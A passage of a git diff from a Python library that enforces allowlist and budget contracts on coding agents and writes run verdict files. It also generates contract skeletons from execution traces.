matches_any(tool, authorized.tools): diff --git a/src/agent_contracts/enforcer.py b/src/agent_contracts/enforcer.py index 941dbc3..0a73daf 100644 --- a/src/agent_contracts/enforcer.py +++ b/src/agent_contracts/enforcer.py @@ -1,26 +1,24 @@ -"""Runtime enforcement middleware — the unified enforcement layer. -Wires together effects, budgets, postconditions, and violations into a -single enforcement flow. Supports three usage patterns: - -1. Decorator: @enforce_contract("path/to/contract.yaml") -2. Context manager: with ContractEnforcer(contract) as enforcer: ... -3. Explicit API: enforcer.check_tool_call(name, args) -""" +"""Runtime enforcement middleware for repo-local coding-agent contracts.""" from __future__ import annotations import functools import inspect +import json +import uuid +from dataclasses import dataclass, field +from datetime import datetime, timezone from pathlib import Path -from typing import Any, Callable, Dict, List, Optional, TypeVar, Union +from typing import Any, Callable, Dict, List, Literal, Optional, TypeVar, Union, cast import jsonschema -from agent_contracts.budgets import BudgetExceededError, BudgetTracker +from agent_contracts.budgets import BudgetExceededError, BudgetSnapshot, BudgetTracker from agent_contracts.effects import EffectGuard from agent_contracts.loader import load_contract from agent_contracts.postconditions import ( + PostconditionError, PostconditionResult, PreconditionError, PreconditionResult, @@ -31,6 +29,79 @@ from agent_contracts.violations import ViolationEmitter, ViolationEvent F = TypeVar("F", bound=Callable[..., Any]) +CheckStatus = Literal["pass", "warn", "fail", "blocked", "skipped"] + + +@dataclass(frozen=True) +class RunCheckResult: + """Result for a named repo check or final gate check.""" + + name: str + status: CheckStatus + required: bool = True + exit_code: Optional[int] = None + detail: Optional[str] = None + evidence: Dict[str, Any] = field(default_factory=dict) + + def to_dict(self) -> Dict[str, Any]: + data: Dict[str, Any] = { + "name": self.name, + "status": self.status, + "required": self.required, + } + if self.exit_code is not None: + data["exit_code"] = self.exit_code + if self.detail is not None: + data["detail"] = self.detail + if self.evidence: + data["evidence"] = self.evidence + return data + + def to_context(self) -> Dict[str, Any]: + return { + "status": self.status, + "required": self.required, + "exit_code": self.exit_code, + "detail": self.detail, + } + + +@dataclass(frozen=True) +class RunVerdict: + """Durable verdict artifact for a contract-governed run.""" + + run_id: str + contract: Dict[str, Any] + host: Dict[str, Any] + outcome: Literal["pass", "warn", "blocked", "fail"] + final_gate: Literal["allowed", "blocked", "failed"] + violations: List[Dict[str, Any]] + checks: List[RunCheckResult] + budgets: Dict[str, Any] + artifacts: Dict[str, Any] + timestamp: str + warnings: List[str] = field(default_factory=list) + + def to_dict(self) -> Dict[str, Any]: + return { + "run_id": self.run_id, + "contract": self.contract, + "host": self.host, + "outcome": self.outcome, + "final_gate": self.final_gate, + "violations": self.violations, + "checks": [check.to_dict() for check in self.checks], + "budgets": self.budgets, + "artifacts": self.artifacts, + "timestamp": self.timestamp, + "warnings": self.warnings, + } + + def write_json(self, destination: Union[str, Path]) -> Path: + path = Path(destination) + path.parent.mkdir(parents=True, exist_ok=True) + path.write_text(json.dumps(self.to_dict(), indent=2, sort_keys=True), encoding="utf-8") + return path class ContractViolation(Exception): @@ -41,12 +112,13 @@ def __init__(self, message: str, event: Optional[ViolationEvent] = None) -> None self.event = event -class ContractEnforcer: - """Unified runtime enforcement for an agent contract. +def load_verdict_artifact(source: Union[str, Path]) -> Dict[str, Any]: + """Load a JSON verdict artifact from disk.""" + return cast(Dict[str, Any], json.loads(Path(source).read_text(encoding="utf-8"))) - Enforces effects (default-deny), budgets (circuit breaker), - input/output schema validation, and postconditions. - """ + +class ContractEnforcer: + """Unified runtime enforcement for an agent contract.""" def __init__( self, @@ -55,14 +127,37 @@ def __init__( violation_destination: str = "stdout", violation_callback: Optional[Callable[[ViolationEvent], None]] = None, cost_callback: Optional[Callable[[], float]] = None, + repo_root: Optional[Union[str, Path]] = None, + host_name: str = "unknown", + host_version: Optional[str] = None, + run_id: Optional[str] = None, ) -> None: self._contract = contract - self._effect_guard = EffectGuard(contract.effects_authorized) + self._repo_root = self._resolve_repo_root(repo_root) + self._effect_guard = EffectGuard(contract.effects_authorized, repo_root=self._repo_root) self._budget_tracker = BudgetTracker(contract.budgets, cost_callback=cost_callback) self._emitter = ViolationEmitter( destination=violation_destination, callback=violation_callback ) self._warnings: List[str] = [] + self._checks: Dict[str, RunCheckResult] = {} + self._run_id = run_id or str(uuid.uuid4()) + self._host_name = host_name + self._host_version = host_version + self._blocked = False + self._postcondition_failure: Optional[PostconditionError] = None + self._postconditions_evaluated = False + self._last_output: Any = None + self._last_extra_context: Optional[Dict[str, Any]] = None + self._finalized_verdict: Optional[RunVerdict] = None + self._artifact_path: Optional[Path] = None + + def _resolve_repo_root(self, repo_root: Optional[Union[str, Path]]) -> Path: + if repo_root is not None: + return Path(repo_root).resolve() + if self._contract.source_path is not None: + return Path(self._contract.source_path).resolve().parent + return Path.cwd().resolve() @property def contract(self) -> Contract: @@ -80,183 +175,441 @@ def violations(self) -> List[ViolationEvent]: def warnings(self) -> List[str]: return list(self._warnings) - # --- Precondition evaluation --- + @property + def checks(self) -> List[RunCheckResult]: + return list(self._checks.values()) - def check_preconditions(self, input_data: Any) -> List[PreconditionResult]: - """Evaluate preconditions against input data before agent runs. + @property + def run_id(self) -> str: + return self._run_id + + @property + def artifact_path(self) -> Optional[Path]: + return self._artifact_path - Raises ContractViolation if any precondition fails. - Returns empty list if no preconditions are defined. - """ + @property + def finalized_verdict(self) -> Optional[RunVerdict]: + return self._finalized_verdict + + def _check_context(self) -> Dict[str, Dict[str, Any]]: + return {name: result.to_context() for name, result in self._checks.items()} + + def _record_blocked_event( + self, + *, + clause: str, + evidence: Dict[str, Any], + message: str, + severity: str = "critical", + ) -> None: + self._blocked = True + event = self._emitter.create_event( + contract_id=self._contract.identity.name, + contract_version=self._contract.identity.version, + violated_clause=clause, + evidence=evidence, + severity=severity, + enforcement="blocked", + ) + raise ContractViolation(message, event=event) + + def _record_failed_event( + self, + *, + clause: str, + evidence: Dict[str, Any], + severity: str = "critical", + ) -> None: + self._emitter.create_event( + contract_id=self._contract.identity.name, + contract_version=self._contract.identity.version, + violated_clause=clause, + evidence=evidence, + severity=severity, + enforcement="failed", + ) + + def _record_warn_event( + self, + *, + clause: str, + evidence: Dict[str, Any], + severity: str = "major", + ) -> None: + self._emitter.create_event( + contract_id=self._contract.identity.name, + contract_version=self._contract.identity.version, + violated_clause=clause, + evidence=evidence, + severity=severity, + enforcement="warned", + ) + + def check_preconditions(self, input_data: Any) -> List[PreconditionResult]: if not self._contract.preconditions: return [] try: return evaluate_preconditions( self._contract.preconditions, input_data, raise_on_failure=True ) - except PreconditionError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause=f"inputs.preconditions.{e.precondition.name}", - evidence={"check": e.precondition.check}, - severity="critical", - enforcement="blocked", + except PreconditionError as exc: + self._record_blocked_event( + clause=f"inputs.preconditions.{exc.precondition.name}", + evidence={"check": exc.precondition.check}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e - - # --- Input validation --- + raise AssertionError("unreachable") def validate_input(self, input_data: Any) -> List[str]: - """Validate input against the contract's input schema. - - Returns list of validation errors. Raises ContractViolation - if schema validation fails and enforcement is sync_block. - """ if self._contract.input_schema is None: return [] validator = jsonschema.Draft202012Validator(self._contract.input_schema) errors = [e.message for e in validator.iter_errors(input_data)] if errors: - self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="inputs.schema", - evidence={"errors": errors, "input_keys": list(input_data.keys()) if isinstance(input_data, dict) else str(type(input_data))}, - severity="major", - enforcement="blocked", + self._record_warn_event( + clause="inputs.schema", + evidence={ + "errors": errors, + "input_type": type(input_data).__name__, + }, ) return errors - # --- Tool call interception --- - def check_tool_call(self, tool_name: str, args: Optional[Dict[str, Any]] = None) -> None: - """Check if a tool call is authorized and within budget. - - Raises ContractViolation if the tool is denied or budget exceeded. - """ - # Effect check + del args if not self._effect_guard.check_tool(tool_name): - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="effects.authorized.tools", - evidence={"tool": tool_name, "authorized": self._contract.effects_authorized.tools if self._contract.effects_authorized else []}, - severity="critical", - enforcement="blocked", + self._record_blocked_event( + clause="effects.authorized.tools", + evidence={ + "tool": tool_name, + "authorized": self._contract.effects_authorized.tools + if self._contract.effects_authorized + else [], + }, + message=f"Tool '{tool_name}' not authorized by contract.", + ) + try: + self._budget_tracker.record_tool_call() + except BudgetExceededError as exc: + self._record_blocked_event( + clause=f"resources.budgets.max_{exc.budget_type}" + if exc.budget_type == "tool_calls" + else f"resources.budgets.{exc.budget_type}", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation( - f"Tool '{tool_name}' not authorized by contract.", event=event + + def check_network_request(self, url: str) -> None: + if not self._effect_guard.check_network(url): + self._record_blocked_event( + clause="effects.authorized.network", + evidence={ + "url": url, + "authorized": self._contract.effects_authorized.network + if self._contract.effects_authorized + else [], + }, + message=f"Network request '{url}' not authorized by contract.", + ) + + def check_state_write(self, scope: str) -> None: + if not self._effect_guard.check_state_write(scope): + self._record_blocked_event( + clause="effects.authorized.state_writes", + evidence={ + "scope": scope, + "authorized": self._contract.effects_authorized.state_writes + if self._contract.effects_authorized + else [], + }, + message=f"State write '{scope}' not authorized by contract.", + ) + + def check_file_read(self, path: Union[str, Path]) -> None: + candidate = str(path) + if not self._effect_guard.check_file_read(candidate): + patterns: List[str] = [] + if ( + self._contract.effects_authorized is not None + and self._contract.effects_authorized.filesystem is not None + ): + patterns = self._contract.effects_authorized.filesystem.read + self._record_blocked_event( + clause="effects.authorized.filesystem.read", + evidence={"path": candidate, "authorized": patterns}, + message=f"File read '{candidate}' not authorized by contract.", + ) + + def check_file_write(self, path: Union[str, Path]) -> None: + candidate = str(path) + if not self._effect_guard.check_file_write(candidate): + patterns: List[str] = [] + if ( + self._contract.effects_authorized is not None + and self._contract.effects_authorized.filesystem is not None + ): + patterns = self._contract.effects_authorized.filesystem.write + self._record_blocked_event( + clause="effects.authorized.filesystem.write", + evidence={"path": candidate, "authorized": patterns}, + message=f"File write '{candidate}' not authorized by contract.", ) - # Budget check — record the tool call + def check_shell_command(self, command: str) -> None: + if not self._effect_guard.check_shell_command(command): + patterns: List[str] = [] + if ( + self._contract.effects_authorized is not None + and self._contract.effects_authorized.shell is not None + ): + patterns = self._contract.effects_authorized.shell.commands + self._record_blocked_event( + clause="effects.authorized.shell.commands", + evidence={"command": command, "authorized": patterns}, + message=f"Shell command '{command}' not authorized by contract.", + ) try: - self._budget_tracker.record_tool_call() - except BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause=f"resources.budgets.{e.budget_type}", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + self._budget_tracker.record_shell_command() + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_shell_commands", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e def add_cost(self, amount: float) -> None: - """Record cost and check against budget limit.""" try: self._budget_tracker.add_cost(amount) - except BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="resources.budgets.max_cost_usd", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_cost_usd", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e def add_tokens(self, count: int) -> None: - """Record token usage and check against budget limit.""" try: self._budget_tracker.add_tokens(count) - except BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="resources.budgets.max_tokens", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_tokens", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e - - # --- Output validation --- def validate_output(self, output_data: Any) -> List[str]: - """Validate output against the contract's output schema.""" if self._contract.output_schema is None: return [] validator = jsonschema.Draft202012Validator(self._contract.output_schema) errors = [e.message for e in validator.iter_errors(output_data)] if errors: - self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="outputs.schema", + self._warnings.append(f"Output validation warnings: {errors}") + self._record_warn_event( + clause="outputs.schema", evidence={"errors": errors}, - severity="major", - enforcement="warned", ) return errors - # --- Postcondition evaluation --- - - def evaluate_postconditions(self, output: Any) -> List[PostconditionResult]: - """Evaluate all postconditions against the output.""" - - def on_warn(pc: Any, o: Any) -> None: - msg = f"Postcondition '{pc.name}' failed (sync_warn)" - self._warnings.append(msg) - self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause=f"contract.postconditions.{pc.name}", - evidence={"check": pc.check, "output_type": str(type(o).__name__)}, - severity=pc.severity, - enforcement="warned", + def evaluate_postconditions( + self, + output: Any, + *, + extra_context: Optional[Dict[str, Any]] = None, + ) -> List[PostconditionResult]: + self._last_output = output + self._last_extra_context = extra_context + merged_context: Dict[str, Any] = {"checks": self._check_context()} + if extra_context: + merged_context.update(extra_context) + + def on_warn(postcondition: Any, _: Any) -> None: + message = f"Postcondition '{postcondition.name}' failed (sync_warn)" + self._warnings.append(message) + self._record_warn_event( + clause=f"contract.postconditions.{postcondition.name}", + evidence={ + "check": postcondition.check, + "checks": self._check_context(), + }, + severity=postcondition.severity, ) - return evaluate_postconditions( - self._contract.postconditions, output, on_warn=on_warn - ) + results: List[PostconditionResult] + try: + results = evaluate_postconditions( + self._contract.postconditions, + output, + extra_context=merged_context, + on_warn=on_warn, + ) + except PostconditionError as exc: + self._postconditions_evaluated = True + self._postcondition_failure = exc + self._record_failed_event( + clause=f"contract.postconditions.{exc.postcondition.name}", + evidence={ + "check": exc.postcondition.check, + "checks": self._check_context(), + "output_type": type(output).__name__, + }, + severity=exc.postcondition.severity, + ) + raise + self._postconditions_evaluated = True + return results - # --- Duration check --- + def record_check( + self, + name: str, + status: CheckStatus, + *, + exit_code: Optional[int] = None, + detail: Optional[str] = None, + required: bool = True, + evidence: Optional[Dict[str, Any]] = None, + ) -> RunCheckResult: + allowed: List[str] = ["pass", "warn", "fail", "blocked", "skipped"] + if status not in allowed: + raise ValueError(f"Unsupported check status: {status}") + result = RunCheckResult( + name=name, + status=status, + required=required, + exit_code=exit_code, + detail=detail, + evidence=evidence or {}, + ) + self._checks[name] = result + if status == "warn": + self._warnings.append(f"Check '{name}' reported warning") + return result def check_duration(self) -> None: - """Check elapsed time against budget limit.""" try: self._budget_tracker.check_duration() - except BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="resources.budgets.max_duration_seconds", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_duration_seconds", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e - # --- Context manager --- + def _default_artifact_path(self) -> str: + return ".agent-contracts/runs/{run_id}/verdict.json" + + def _resolved_artifact_path(self, artifact_path: Optional[Union[str, Path]]) -> Path: + raw = ( + str(artifact_path) + if artifact_path is not None + else ( + self._contract.observability.run_artifact_path + if self._contract.observability and self._contract.observability.run_artifact_path + else self._default_artifact_path() + ) + ) + formatted = raw.format(run_id=self._run_id) + path = Path(formatted) + if not path.is_absolute(): + path = self._repo_root / path + return path.resolve() + + def _snapshot_budgets(self) -> Dict[str, Any]: + snapshot: BudgetSnapshot = self._budget_tracker.snapshot() + return { + "cost_usd": snapshot.cost_usd, + "tokens": snapshot.tokens, + "tool_calls": snapshot.tool_calls, + "shell_commands": snapshot.shell_commands, + "duration_seconds": snapshot.elapsed_seconds, + } + + def finalize_run( + self, + *, + output: Any = None, + extra_context: Optional[Dict[str, Any]] = None, + artifact_path: Optional[Union[str, Path]] = None, + execution_error: Optional[BaseException] = None, + ) -> RunVerdict: + if self._finalized_verdict is not None and artifact_path is None: + return self._finalized_verdict + + if isinstance(execution_error, PostconditionError) and self._postcondition_failure is None: + self._postcondition_failure = execution_error + self._record_failed_event( + clause=f"contract.postconditions.{execution_error.postcondition.name}", + evidence={"check": execution_error.postcondition.check}, + severity=execution_error.postcondition.severity, + ) + if isinstance(execution_error, ContractViolation): + self._blocked = True + + candidate_output = self._last_output if output is None else output + if candidate_output is not None and not self._postconditions_evaluated: + try: + self.evaluate_postconditions(candidate_output, extra_context=extra_context) + except PostconditionError: + pass + + required_check_failure = any( + check.required and check.status in {"fail", "blocked"} + for check in self._checks.values() + ) + warning_present = any(check.status == "warn" for check in self._checks.values()) or bool( + self._warnings + ) + unexpected_error = ( + execution_error is not None + and not isinstance(execution_error, (ContractViolation, PostconditionError)) + ) + + if self._blocked: + outcome: Literal["pass", "warn", "blocked", "fail"] = "blocked" + final_gate: Literal["allowed", "blocked", "failed"] = "blocked" + elif self._postcondition_failure is not None or required_check_failure or unexpected_error: + outcome = "fail" + final_gate = "failed" + elif warning_present: + outcome = "warn" + final_gate = "allowed" + else: + outcome = "pass" + final_gate = "allowed" + + self._artifact_path = self._resolved_artifact_path(artifact_path) + timestamp = datetime.now(timezone.utc).isoformat() + contract_path = self._contract.source_path + artifacts: Dict[str, Any] = {"verdict_path": str(self._artifact_path)} + if contract_path is not None: + artifacts["contract_path"] = contract_path + + verdict = RunVerdict( + run_id=self._run_id, + contract={ + "name": self._contract.identity.name, + "version": self._contract.identity.version, + "spec_version": self._contract.spec_version, + }, + host={"name": self._host_name, "version": self._host_version}, + outcome=outcome, + final_gate=final_gate, + violations=[event.to_dict() for event in self.violations], + checks=self.checks, + budgets=self._snapshot_budgets(), + artifacts=artifacts, + timestamp=timestamp, + warnings=self.warnings, + ) + verdict.write_json(self._artifact_path) + self._finalized_verdict = verdict + return verdict def __enter__(self) -> "ContractEnforcer": return self def __exit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None: - pass + if self._finalized_verdict is None: + self.finalize_run(execution_error=exc_val) def enforce_contract( @@ -265,14 +618,7 @@ def enforce_contract( violation_destination: str = "stdout", strict: bool = True, ) -> Callable[[F], F]: - """Decorator that wraps a function with contract enforcement. - - The decorated function receives a `_enforcer` keyword argument - providing the ContractEnforcer instance for tool call checks. - - Input validation runs before the function. - Output validation and postconditions run after. - """ + """Decorator that wraps a function with contract enforcement.""" contract = load_contract(source, strict=strict) def decorator(fn: F) -> F: @@ -281,37 +627,34 @@ def wrapper(*args: Any, **kwargs: Any) -> Any: enforcer = ContractEnforcer( contract, violation_destination=violation_destination ) - # Only inject _enforcer if the function accepts it sig = inspect.signature(fn) if "_enforcer" in sig.parameters or any( - p.kind == inspect.Parameter.VAR_KEYWORD for p in sig.parameters.values() + param.kind == inspect.Parameter.VAR_KEYWORD + for param in sig.parameters.values() ): kwargs["_enforcer"] = enforcer - # Pre: validate input if first positional arg is present - if args and contract.input_schema is not None: - errors = enforcer.validate_input(args[0]) - if errors: - raise ContractViolation( - f"Input validation failed: {errors}" - ) - - # Pre: evaluate preconditions - if args and contract.preconditions: - enforcer.check_preconditions(args[0]) + try: + if args and contract.input_schema is not None: + errors = enforcer.validate_input(args[0]) + if errors: + enforcer._blocked = True + raise ContractViolation(f"Input validation failed: {errors}") - result = fn(*args, **kwargs) + if args and contract.preconditions: + enforcer.check_preconditions(args[0]) - # Post: validate output - if contract.output_schema is not None: - errors = enforcer.validate_output(result) - if errors: - enforcer._warnings.append(f"Output validation warnings: {errors}") + result = fn(*args, **kwargs) - # Post: evaluate postconditions - enforcer.evaluate_postconditions(result) + if contract.output_schema is not None: + enforcer.validate_output(result) - return result + enforcer.evaluate_postconditions(result) + enforcer.finalize_run(output=result) + return result + except Exception as exc: + enforcer.finalize_run(execution_error=exc) + raise return wrapper # type: ignore[return-value] diff --git a/src/agent_contracts/init_from_trace.py b/src/agent_contracts/init_from_trace.py index 7d55da6..077f9fd 100644 --- a/src/agent_contracts/init_from_trace.py +++ b/src/agent_contracts/init_from_trace.py @@ -1,58 +1,168 @@ -"""Generate contract skeletons from execution traces. -Reads JSONL trace files and infers: -- Identity from agent metadata -- Tool allowlist from observed tool calls -- Budget estimates from observed resource usage -- Postcondition candidates from output patterns -""" +"""Generate coding-agent contract skeletons from execution traces.""" from __future__ import annotations import json -from pathlib import Path -from typing import Any, Dict, List, Optional, Set, Union +from pathlib import Path, PurePosixPath +from typing import Any, Dict, Iterable, List, Optional, Set, Tuple, Union, cast import yaml def _read_traces(source: Union[str, Path]) -> List[Dict[str, Any]]: - """Read JSONL trace file, returning list of trace entries.""" path = Path(source) traces: List[Dict[str, Any]] = [] - with open(path, encoding="utf-8") as f: - for _line_num, line in enumerate(f, 1): + with open(path, encoding="utf-8") as handle: + for line in handle: line = line.strip() if not line: continue try: - traces.append(json.loads(line)) + payload = json.loads(line) except json.JSONDecodeError: - pass # Skip malformed lines + continue + if isinstance(payload, dict): + traces.append(payload) return traces +def _iter_events(trace: Dict[str, Any]) -> Iterable[Dict[str, Any]]: + yield trace + events = trace.get("events", []) + if isinstance(events, list): + for event in events: + if isinstance(event, dict): + yield event + + def _extract_tools(traces: List[Dict[str, Any]]) -> List[str]: - """Extract unique tool names from traces.""" tools: Set[str] = set() for trace in traces: - # Support various trace formats - if "tool_calls" in trace: - for tc in trace["tool_calls"]: - name = tc.get("name") or tc.get("tool") or tc.get("function", {}).get("name") + for entry in _iter_events(trace): + tool_calls = entry.get("tool_calls", []) + if isinstance(tool_calls, list): + for tool_call in tool_calls: + if isinstance(tool_call, dict): + name = tool_call.get("name") or tool_call.get("tool") + if name: + tools.add(str(name)) + if entry.get("type") == "tool_call": + name = entry.get("name") or entry.get("tool_name") if name: - tools.add(name) - if "tool" in trace and "name" in trace: - tools.add(trace["name"]) - if "type" in trace and trace["type"] == "tool_call": - name = trace.get("name") or trace.get("tool_name") - if name: - tools.add(name) + tools.add(str(name)) return sorted(tools) -def _extract_budgets(traces: List[Dict[str, Any]]) -> Dict[str, Any]: - """Estimate budget limits from observed resource usage (with 20% headroom).""" +def _extract_network(traces: List[Dict[str, Any]]) -> List[str]: + urls: Set[str] = set() + for trace in traces: + for entry in _iter_events(trace): + for key in ("url", "endpoint"): + value = entry.get(key) + if isinstance(value, str) and value.startswith(("http://", "https://")): + urls.add(value) + requests = entry.get("network_requests", []) + if isinstance(requests, list): + for request in requests: + if isinstance(request, dict): + url = request.get("url") + if isinstance(url, str): + urls.add(url) + return sorted(urls) + + +def _normalize_path(path: str) -> Optional[str]: + candidate = path.strip() + if not candidate: + return None + posix = PurePosixPath(candidate.lstrip("./")) + if str(posix) == ".": + return None + return posix.as_posix() + + +def _infer_globs(paths: Set[str]) -> List[str]: + patterns: Set[str] = set() + for path in paths: + normalized = _normalize_path(path) + if normalized is None: + continue + parts = PurePosixPath(normalized).parts + if len(parts) <= 1: + patterns.add(normalized) + else: + patterns.add(f"{parts[0]}/**") + return sorted(patterns) + + +def _extract_filesystem(traces: List[Dict[str, Any]]) -> Dict[str, List[str]]: + read_paths: Set[str] = set() + write_paths: Set[str] = set() + for trace in traces: + for entry in _iter_events(trace): + filesystem = entry.get("filesystem") + if isinstance(filesystem, dict): + for value in filesystem.get("read", []): + if isinstance(value, str): + read_paths.add(value) + for value in filesystem.get("write", []): + if isinstance(value, str): + write_paths.add(value) + for key in ("file_reads", "files_read", "read_paths"): + values = entry.get(key, []) + if isinstance(values, list): + for value in values: + if isinstance(value, str): + read_paths.add(value) + for key in ("file_writes", "files_written", "write_paths"): + values = entry.get(key, []) + if isinstance(values, list): + for value in values: + if isinstance(value, str): + write_paths.add(value) + event_type = entry.get("type") + path_value = entry.get("path") + if isinstance(path_value, str): + if event_type in {"file_read", "filesystem.read"}: + read_paths.add(path_value) + if event_type in {"file_write", "filesystem.write"}: + write_paths.add(path_value) + result: Dict[str, List[str]] = {} + read_globs = _infer_globs(read_paths) + write_globs = _infer_globs(write_paths) + if read_globs: + result["read"] = read_globs + if write_globs: + result["write"] = write_globs + return result + + +def _extract_shell_commands(traces: List[Dict[str, Any]]) -> Tuple[List[str], int]: + commands: Set[str] = set() + max_count = 0 + for trace in traces: + count = 0 + for entry in _iter_events(trace): + values = entry.get("shell_commands", []) + if isinstance(values, list): + for value in values: + if isinstance(value, str): + commands.add(" ".join(value.strip().split())) + count += 1 + elif isinstance(value, dict) and isinstance(value.get("command"), str): + commands.add(" ".join(value["command"].strip().split())) + count += 1 + event_type = entry.get("type") + command = entry.get("command") + if event_type in {"shell", "shell_command", "command"} and isinstance(command, str): + commands.add(" ".join(command.strip().split())) + count += 1 + max_count = max(max_count, count) + return sorted(commands), max_count + + +def _extract_budgets(traces: List[Dict[str, Any]], max_shell_commands: int) -> Dict[str, Any]: max_cost = 0.0 max_tokens = 0 max_tool_calls = 0 @@ -64,11 +174,10 @@ def _extract_budgets(traces: List[Dict[str, Any]]) -> Dict[str, Any]: tokens = usage.get("total_tokens", 0) or trace.get("total_tokens", 0) tool_calls = len(trace.get("tool_calls", [])) duration = trace.get("duration_seconds", 0) or (trace.get("latency_ms") or 0) / 1000 - - max_cost = max(max_cost, cost) - max_tokens = max(max_tokens, tokens) - max_tool_calls = max(max_tool_calls, tool_calls) - max_duration = max(max_duration, duration) + max_cost = max(max_cost, float(cost or 0)) + max_tokens = max(max_tokens, int(tokens or 0)) + max_tool_calls = max(max_tool_calls, int(tool_calls)) + max_duration = max(max_duration, float(duration or 0)) budgets: Dict[str, Any] = {} if max_cost > 0: @@ -79,23 +188,22 @@ def _extract_budgets(traces: List[Dict[str, Any]]) -> Dict[str, Any]: budgets["max_tool_calls"] = int(max_tool_calls * 1.2) + 1 if max_duration > 0: budgets["max_duration_seconds"] = round(max_duration * 1.2, 1) - + if max_shell_commands > 0: + budgets["max_shell_commands"] = int(max_shell_commands * 1.2) + 1 return budgets def _extract_identity(traces: List[Dict[str, Any]]) -> Dict[str, str]: - """Extract agent identity from traces.""" for trace in traces: agent = trace.get("agent", {}) if isinstance(agent, dict): name = agent.get("name") version = agent.get("version") if name: - return {"name": name, "version": version or "0.1.0"} + return {"name": str(name), "version": str(version or "0.1.0")} agent_name = trace.get("agent_name") or trace.get("agent_id") if agent_name: - return {"name": agent_name, "version": "0.1.0"} - + return {"name": str(agent_name), "version": "0.1.0"} return {"name": "unnamed-agent", "version": "0.1.0"} @@ -105,12 +213,7 @@ def generate_contract_from_traces( agent_name: Optional[str] = None, agent_version: Optional[str] = None, ) -> Dict[str, Any]: - """Generate a contract skeleton from execution traces. - - Returns a dict ready to be serialized as YAML. - """ traces = _read_traces(source) - identity = _extract_identity(traces) if agent_name: identity["name"] = agent_name @@ -118,7 +221,10 @@ def generate_contract_from_traces( identity["version"] = agent_version tools = _extract_tools(traces) - budgets = _extract_budgets(traces) + network = _extract_network(traces) + filesystem = _extract_filesystem(traces) + shell_commands, max_shell_commands = _extract_shell_commands(traces) + budgets = _extract_budgets(traces, max_shell_commands) contract: Dict[str, Any] = { "agent_contract": "0.1.0", @@ -134,21 +240,23 @@ def generate_contract_from_traces( } ] }, + "observability": { + "run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json" + }, } - # Tier 1 fields (if we have data) - if tools: - contract["effects"] = { - "authorized": { - "tools": tools, - "network": [], - "state_writes": [], - } - } - + authorized: Dict[str, Any] = { + "tools": tools, + "network": network, + "state_writes": [], + } + if filesystem: + authorized["filesystem"] = filesystem + if shell_commands: + authorized["shell"] = {"commands": shell_commands} + contract["effects"] = {"authorized": authorized} if budgets: contract["resources"] = {"budgets": budgets} - return contract @@ -158,8 +266,7 @@ def generate_contract_yaml( agent_name: Optional[str] = None, agent_version: Optional[str] = None, ) -> str: - """Generate a contract YAML string from execution traces.""" data = generate_contract_from_traces( source, agent_name=agent_name, agent_version=agent_version ) - return yaml.dump(data, sort_keys=False, default_flow_style=False) + return cast(str, yaml.dump(data, sort_keys=False, default_flow_style=False)) diff --git a/src/agent_contracts/loader.py b/src/agent_contracts/loader.py index 834162e..73c0bc9 100644 --- a/src/agent_contracts/loader.py +++ b/src/agent_contracts/loader.py @@ -20,6 +20,7 @@ EffectsDeclared, ErrorDef, FailureModel, + FilesystemAuthorization, LatencySLO, MetricDef, ObservabilityConfig, @@ -27,6 +28,7 @@ PostconditionSLO, PreconditionDef, ResourceBudgets, + ShellAuthorization, SLOConfig, SubstitutionConfig, TracesConfig, @@ -81,10 +83,25 @@ def _build_postcondition(raw: Dict[str, Any]) -> PostconditionDef: def _build_effects_authorized(raw: Dict[str, Any]) -> EffectsAuthorized: + filesystem_raw = raw.get("filesystem") + filesystem = None + if isinstance(filesystem_raw, dict): + filesystem = FilesystemAuthorization( + read=filesystem_raw.get("read", []), + write=filesystem_raw.get("write", []), + ) + + shell_raw = raw.get("shell") + shell = None + if isinstance(shell_raw, dict): + shell = ShellAuthorization(commands=shell_raw.get("commands", [])) + return EffectsAuthorized( tools=raw.get("tools", []), network=raw.get("network", []), state_writes=raw.get("state_writes", []), + filesystem=filesystem, + shell=shell, ) @@ -103,6 +120,7 @@ def _build_budgets(raw: Dict[str, Any]) -> ResourceBudgets: max_tokens=budgets.get("max_tokens"), max_tool_calls=budgets.get("max_tool_calls"), max_duration_seconds=budgets.get("max_duration_seconds"), + max_shell_commands=budgets.get("max_shell_commands"), ) @@ -148,7 +166,12 @@ def _build_observability(raw: Dict[str, Any]) -> ObservabilityConfig: ] ve_raw = raw.get("violation_events") ve = ViolationEventsConfig(**ve_raw) if isinstance(ve_raw, 